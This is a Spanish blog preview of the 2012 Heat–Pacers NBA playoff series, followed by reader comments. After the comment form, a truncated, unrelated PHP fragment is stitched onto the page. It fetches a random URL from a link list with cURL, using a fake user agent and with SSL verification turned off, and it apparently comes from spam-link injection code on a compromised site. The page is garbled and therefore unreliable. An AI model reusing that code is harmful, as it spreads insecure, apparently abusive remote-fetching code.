Análisis Miami Heat (2) vs Indiana Pacers (3)

13 de May de 2012 por txusma

Regular: 3-1

Heat: 98.5 PF – 92.5 PC
Pacers: 97.7 PF – 94.4 PC

Comienzan las tempranas semifinales de la Conferencia Este para Lebron y cía. y lo hacen con polémica incluida tras las declaraciones del entrenador de los Pacers Frank Vogel, quien ha iniciado por cuenta y riesgo una afrenta personal contra los ‘teatreros’ Heat. Según él “Se dejan caer al suelo sin contacto. Tirarse así es un problema en esta liga. Miami abusa de ese truco, y tiene algunos jugadores que lo hacen demasiado”, asegura Vogel.

De esta manera, los Pacers continúan con la estrategia de acoso y derribo contra los Heat que iniciaron los Knicks desde Nueva York, aunque con nula fortuna en su caso como ya se vio en las últimas semanas. Desde ‘South Beach’ no han tardado en responder a Vogel, como si el primer partido ya hubiera comenzado. Spoelstra ha declarado que sencillamente “les importa un bledo” lo que diga Vogel, y Bosh además indica que esta provocación les servirá para motivarse. “Sus declaraciones son un estímulo para mí. Esto nos hará jugar todavía con más corazón y fuerza”, aseveró el ala-pívot texano. Estas declaraciones supondrían una sanción económica en otros tiempos, de los que podría dar buena fe Mark Cuban, propietario de los Mavericks, pero este año la NBA se ha relajado con las sanciones y las ‘rajadas’ van y vienen de una costa a otra del continente norteamericano con total impunidad.

Así ha logrado un novicio en las artes de la provocación como Frank Vogel despertar al campeón en ciernes Miami Heat. Su rugido y sus zarpas pueden descabezar a un equipo como Indiana Pacers, que no pondrá las cosas fáciles, a priori. Después de la eliminación del campeón de la temporada regular, los Chicago Bulls, ahora todas las miradas se centrarán en esta eliminatoria. Sobre el papel habrá más igualdad que en la anterior, porque los Pacers llevan jugando muy bien toda la temporada y esto sí parece complicar las cosas para los Heat, al contrario de lo que ocurrió en el simulacro contra los Knicks. No obstante, en la temporada regular se han enfrentado cuatro veces y los Pacers solo han podido llevarse una victoria, eso sí, fue la última en el cómputo global de enfrentamientos. Con todos los pronósticos en contra, los amarillos buscarán dar la sorpresa y volver a las finales de conferencia después de 8 años de ausencia, pero la empresa parece demasiado complicada y todo apunta a que se quedarán lejos de repetir la gesta que consiguieron en el año 2000, cuando perdieron las finales de la NBA frente a los Lakers. Sin embargo, pase lo que pase ellos ya han cumplido más que de sobra sus expectativas, jugando una regular magnífica y llegando fácilmente a semifinales.

Para los Heat, al contrario, el reto de pasar de semifinales es una obligación. Realmente, el listón está muy alto para ellos, pues todos piensan que deberían pasearse en esta eliminatoria y llevarse el título de Conferencia Este con relativa facilidad, así como el título de la NBA. Para ello tendrán que emplearse a fondo en esta eliminatoria ‘trampa’, porque puede resultar más difícil incluso que la propia final de Conferencia. Aparentemente, todos los jugadores de los Heat llegan en gran estado de forma y muy enchufados mentalmente; en especial su estrella Lebron James, quien firmó unas estadísticas de infarto en primera ronda (28-6-6) y además estrenará contra los Pacers su recién reconquistada corona como MVP de la NBA. Veremos si es capaz de plasmarlo en el parqué contra un equipo mucho más defensivo que los sobredimensionados Knicks.

Claves de la eliminatoria

– Dos bases guardianes de su guarida. George Hill y Mario Chalmers representan muy bien la evolución física de los clásicos ‘guards’ de la NBA. Son dos tipos que parecen más bien escoltas o aleros por su constitución corporal, suben la pelota con eficiencia, tiran correctamente y saben leer los partidos, además de ser capaces de defender a niveles de sobresaliente en muchos momentos. Ambos ponen la masa para sus equipos sin hacer mucho ruido y construyen las victorias desde atrás. En esta guerra a priori debería poner orden Hill, pero el problema radica en que los Heat tiene muchos planes para crear juego, y estos planes no pasan exclusivamente por las manos de Chalmers. Spoelstra puede dar más sorpresas en su planteamiento y Vogel, en cambio, está mucho más limitado. El juego de los Pacers nace de las manos de Hill. Si Spoelstra lo ‘seca’ con Chalmers o Wade, dos tipos físicamente privilegiados, Indiana se puede atascar en ataque y perder mucha frescura. En el banquillo tienen a Collison, que a pesar de jugar bien el último partido de la serie contra los Magic, no parece preparado para controlar el ritmo de una eliminatoria en la que el Heat va a defender a muerte la creación de los Pacers.

– Lebron polifacético. Lebron James asumirá todo tipo de tareas en su equipo. Por una parte debería desgastar a su par Danny Granger pues es superior físicamente a él y lo debe demostrar, tanto en defensa como en ataque. De esta manera, el alero de los Pacers podría tener muchos problemas para mantener su gran media de 21 puntos por partido en estos Playoffs. Además, en momentos puntuales la eliminatoria quizás requiera un emparejamiento contra David West, quien está en un momento muy dulce. Puede que Lebron sea el hombre clave para cumplir la misión de frenarle formando pareja en la zona con Chris Bosh, y posicionando a Battier sobre la marca de Granger. Y por si esto no fuera poco, la naturaleza de juego de James requiere tener mucho el balón en las manos. La creación del juego se le supone al líder de los Heat, ya sea para decidir él mismo o usar su gran habilidad para repartir canastas entre sus compañeros. Desde peón de la obra hasta escayolista, ninguna tarea parece no estar hecha para él. Si está a su nivel habitual, esta eliminatoria tendrá muy poca historia.

– Hibbert, ahora o nunca. Ok, ya sabemos que puede jugar el All-Star porque en su conferencia no hay nadie que dé la talla en su posición excepto Howard, pero la pregunta es si demostrará todas las cualidades que se le suponen contra la zona de los Heat, porque contra los Magic no lo demostró ni de lejos. Aparentemente, sus compañeros deberían buscarle en muchas jugadas, pues es superior a cualquier par que Spoelstra coloque sobre su marca y sacará muchas personales ante la falta de centímetros de los pívots miamenses. Sin embargo, para que su incidencia real en el juego de los Pacers pase factura, tiene que asumir más lanzamientos y producir más puntos. En la eliminatoria contra los Magic apenas tiró la mitad que sus compañeros Granger y West, y eso que tenía a Glen Davis en la marca. Incluso George Hill probó más lanzamientos. En esta eliminatoria los Pacers no pueden prescindir de uno de sus jugadores más importantes. Todo lo contrario. Balones a Roy Hibbert debe ser la premisa. Si es así, quizá obligue a los Heat a poner a Bosh en su defensa con Lebron como ‘4’. Será interesante comprobarlo. Hibbert, además, termina contrato esta temporada y no le faltarán novias en verano, por lo que tiene que reivindicarse para conseguir un gran contrato. Veremos si lo consigue.

– Llevar el partido a menos puntos. Esta debe ser la gran obsesión de los Pacers: la defensa total. No pueden permitirse lagunas en este aspecto, pues como se demostró contra los Knicks, si los Heat está concentrados en ataque es prácticamente imbatible. Además, Miami es capaz de producir más de 20 puntos por tres vías distintas: James, Wade y Bosh, es decir, el temido ‘Big Three’. Puedes parar una de ellas, pero ni de lejos las tres a la vez. Por tanto, es obligatorio para los Pacers centrarse muchísimo en defender y no permitir canastas fáciles. No les beneficiará jugar a más de 90 puntos, porque ellos solo tienen un líder anotador, que es Granger, por los tres del Heat. Así, se antoja fundamental la labor de Paul George sobre Wade, y de West sobre Bosh. Ellos son capaces de conseguir partidos malos de sus marcas, pues lo llevan haciendo toda la temporada. Las dudas en este aspecto se ciernen sobre Granger. ¿Hasta qué punto puede frenar a Lebron? ¿Las declaraciones de Vogel son una indirecta muy directa para que los árbitros le permitan defender con dureza al 6 de los Heat?

Pronóstico

4-2, Miami.

Comenta

17 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Bueno Sancho no se muy bien que esperas de Hibbert pero decir que contra los Magic no ha demostrado nada es mentir. Ha promediado 11 puntos, 11 rebotes y casi 4 tapones con un 53% en tiros. Que su anotación no vaya a mas tiene mucho que ver con el tipo de juego que hacen los Pacers, pero su serie ha sido excelente.

      Citar

  2. HisRoyalAirness dice:
    #2

    Que baje Larry al banquillo a dirigirlos! Verían lo que es la motivación!

      Citar

  3. melo15 dice:
    #3

    4-1 para Miami y porque los Heat se dejaran ganar uno alli. Totalmente superiores.
    Granger vs Lebron: El actual MVP de la liga va a rebentar a Granger, si Melo no a podido con Bron dudo que Granger lo consiga.
    Hibbert: Puede ser el factor clave pero si los Pacers se siguen mostrando reacios a darle mas balones dejara de ser un factor tan decisivo.
    Banquillo: Aqui si que ganan los Pacers, pero bueno tambien ganaban los Knicks y mira…

      Citar

  4. rumbero dice:
    #4

    4-3 para Miami. A mi es que me gustan estos Pacers, y van a llegar bastante frescos como para aguantar el ritmo que exige Miami. Creo que tienen suficientes variantes como para poder hacerles algo de daño. La pintura puede ser muy importante (Vogel debe saberlo) y parece que West llega en el mejor momento de la temporada.
    Luego llegara Lebron y les pintara la cara a todos pero creo que puede estar mas entretenida de lo que parece.

      Citar

  5. Sancho88 dice:
    #5

    Cierto DIrk, no había visto lo de los tapones. Pero sigo manteniendo que es fundamental que su producción ofensiva aumente, porque es el único tipo de los Pacers que puede cambiar todo el esquema de los Heat si empieza a enchufarlas, a forzar faltas, etc. Si es capaz de que Spoelstra cambie el esquema en momentos determinados y tenga que poner a Bosh sobre su marca y a Lebron de 4, creo que Pacers tendrán alguna opción más de las remotas posibilidades que tienen en la eliminatoria. Es lo que quiero decir. Yo no critico a Hibbert por su defensa, porque ahí se va a comer a cualquier cinquillo que ponga Spoelstra, pero digo que en ataque tiene que asumir más protagonismo, solamente eso. Y lo que decía de la serie contra Magic iba por ahí, ya que si te has fijado desde hace algunos meses yo defiendo que en ataque Hibbert es un jugador del montón, con un tiro no demasiado académico y que se intenta ahorrar tiros para no fallar, y las que mete son debajo del aro. Tiene qeu producir más, solamente digo eso. Cualquier pívot que tire tan poco a canasta es capaz de hacer ese 53% en TC como él ha logrado. Pero yo creo que tiene potencial para llevar asumir más lanzamientos y sacar faltas. Si no, estarían desaprovechando el único emparejamiento en el cual Pacers son superiores a Heat. Ya digo, balones a Hibbert y a West tb, ojo. Entre los dos pueden producir más de 30 puntos por noche si se lo proponen. Lo apunto como clave, a mí me encanta Hibbert en muchos aspectos, pero ya digo, no me gusta demasiado su tiro a canasta y creo que se ahorra tiros para no fallar. Tb. le pasa en algunos partidos puntuales a Marc, y también lo critico. Era solamente eso. Se agradecen las críticas

      Citar

  6. Sancho88 dice:
    #6

    “la pregunta es si demostrará todas las cualidades que se le suponen contra la zona de los Heat, porque contra los Magic no lo demostró ni de lejos”.

    Esta es la frase exacta. Estoy criticando su ataque, no su defensa, como se puede ver. 11 puntos me parece muy poca aportación. No es un Ibaka o un DeAndre Jordan. A Hibber se le presupone cierto talento ofensivo no? Sobre todo por lo que comento, que George Hill tiró más que él, y si te das cuenta, Hill es un tipo que tira poco, que solo cuando está solo o ha agotando el resto de oportunidades porque sus compañeros no han encontrado el sitio, se atreve a tirar. Eso es un hecho, y además estoy seguro de que este dato que comento se revertirá. Si es capaz de rozar el 50%, tirando tres o cuatro veces más a canasta y produciendo más de 15 puntos por partido, pueden cambiar ciertos sistemas de Heat

      Citar

  7. MagicJohnson32 dice:
    #7

    Es que, Sancho, conforme David West ha ido mejorando su rendimiento, a los Pacers les ha ido pasando con mayor frecuencia que se olvidan de Hibbert en ataque. Cuando, además, con Hibbert puedes hacer perfectamente como con los dos hermanos Gasol, que es dársela en el poste alto para que distribuya (y así, además, generas más espacios para West cerca del aro).

    De todos modos, con un PF como West a su lado y frente un equipo con LeBron y Wade, el papel de Hibbert es más importante como última línea de defensa ante las penetraciones rivales que lo que pueda aportar en ataque.

      Citar

  8. Esteban dice:
    #8

    granger no marcar aa lebron, lo hara george, que es tan alto, atleticoy casi tan fuerte como lebron, ya lo he dicho,este chico george es la reencarnacion del mejor artest en los pacers, va a llegar lejos

    el primer cuarto de la serie, con una concentracion y una direza estan jugando los pacers que hacen ilusionar que sera una serie pareja

      Citar

  9. melo15 dice:
    #9

    Y Granger a quien a Wade?? Si es asi Flash le va a hacer un roto cada vez que le encare, nono hay que poner a Granger, porque sencillamente Granger no puede con Wade.

      Citar

  10. Nacho dice:
    #10

    Parece chungo lo de Bosh. Se complica Miami.

      Citar

  11. Sancho88 dice:
    #11

    No sé Esteban, yo pienso que a Granger le puede ir incluso peor defender a Wade eh? Lo ideal para ellos sería clonar a George, jeje, pero eso no va a poder ser. Y además, me reitero en que yo pienso que la provocación de Vogel y la petición de respeto a los árbitros viene precisamente por ese emparejamiento, para que no le carguen con muchas faltas a Granger. No sé, es la clave de la eliminatoria, la actitud de Granger en defensa. Se le debe exigir mucho porque los partidos no solo se ganan en ataque. Y hombre, está bien que busquen a West, tiene mucho talento y seguramente ronde la veintena de puntos por partido, pero creo que quizá sería efectivo meterle también balones a Hibbert, usar mucho mucho la pintura, desgastar ahí a los Heat, porque a Granger le puede pasar lo mismo que a Melo, Smith, etc.; y es que la defensa perimetral del Heat es brutal.

    Es decir, yo lo veo sencillo. Por fuera no puedes atacar porque eres inferior, y por dentro les puedes poner en muchos apuros porque eres superior no? Pues a desgastar a saco a los interiores del Heat y a surtir de balones a tus dos pívots que son mucho mejores que los del rival. Bosh en defensa jamás ha sido nada del otro mundo, y Turiaf o Anthony con Hibbert me dan tantas ganas de reir que me parto. Ahora bien, hay otra pequeña clave que no he indicado, y es que Hansbrough tiene que hacer algo cuando salga, no sé coño, al menos 7-8 puntos. Está fatal fatal…

      Citar

  12. melo15 dice:
    #12

    Joder pues si se lesiona Bosh la cosa pinta bastante peor para los Heat, definitivamente pondria a Bron de ala-pivot que tampoco es mucho mas bajo que West apenas 2cm y con Battier de alero. Si es verdad que Bosh esta lesionado pronostico un 4-2 para Miami.

      Citar

  13. Sancho88 dice:
    #13

    Lo que me temía, Granger bajando gravementes sus prestaciones y solo respondiendo bien los interiores… a pesar de la baja de Bosh, esta serie huele muy favorable a Heat

      Citar

  14. Esteban dice:
    #14

    enormes partidos de hibbert y west, y la rotacion larga de los pacers dio resultado, el problema sigue siendo…

    granger, su gran espada, 1/10 de cancha, y dudo mucho que pueda reponerse de gran forma, no creo que vaya a promediar mas de 10 puntos en esta serie, por mejor equipo que tengan los pacers, como ya les paso el año pasado frente a chicago donde llego a los minutos finales arriba en el marcador en 3 de las 4 derrotas, dificilmente puedan ganar partidos de PO si no tienen un tio capaz de generarse su tiro en los momentos claves,

    wade y lebron dieron catedra, 32 y 29 puntos respectivamente, tremendo, habra que ver si prueban con una zona bien cerrada los pacers para frenar sus penetraciones

    lesion de bosh!! era hora que el heat tuviera algun problema de lesiones, a rio revuelto ganancia de pescadores, no tanto para esta serie donde son claros favoritos, pero si lo de bosh es grave, el juego interior del heat es el peor de la nba, y alli los pescadores que se frotan las manos son los celtics

      Citar

  15. Esteban dice:
    #15

    Yess pacers! Yes yes yes!

    Justicia para NY, lin, shumpert, amare y baron

    No es tan facil cuando te faltan jugadores no heat?

      Citar

  16. German dice:
    #16

    Gran victoria de los Pacers pese a que no supieron cerrar el partido fallando tiros libres y permitiendo muchos rebotes ofensivos. Miami tambien fallo tiros libres claves al final.
    Muy tendencioso me parecio el arbitraje, cualquier roce era falta a favor del Heat y en el otro costado tenia que ocurrir un asesinato para que piten. Incluso una tremenda flagrante que si en lugar de Wade la hubiera cometido un James Jones o Turiaf era de tipo 2.

      Citar

  17. GreenPride dice:
    #17

    Llego tarde para comentar la serie pues ya he visto el primer partido (no el segundo que se jugó anoche). Antes de conocer la lesión de Bosh hubiera apostado un claro 4-1 para los Heat, ahora con ella creo que la cosa cambia.
    Creo que la clave era que Bosh podía ser superior a West o al menos igualarlo y que Hibbert no era un interior tan decisivo con lo que la superioridad de LeBron-Wade y la gran defensa exterior de los Heat iba a hacer papilla a los Pacers (sobre todo a Granger). Con la baja de Bosh, la defensa de los Pacers debería cerrarse mucho más para tratar de que LeBron y Wade no pisen tanto la pintura y West-Hibbert deberían hacer valer su superioridad interior para anotar y poder liberar algo más a Granger y George en el exterior.
    Fundamental que Hibbert pueda no cargarse de faltas y dominar en ataque para recibir dobles marcajes y que sus exteriores puedan aprovecharlo.
    Sigo pensando que los Heat pasarán pero ahora tal vez en 7 partidos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>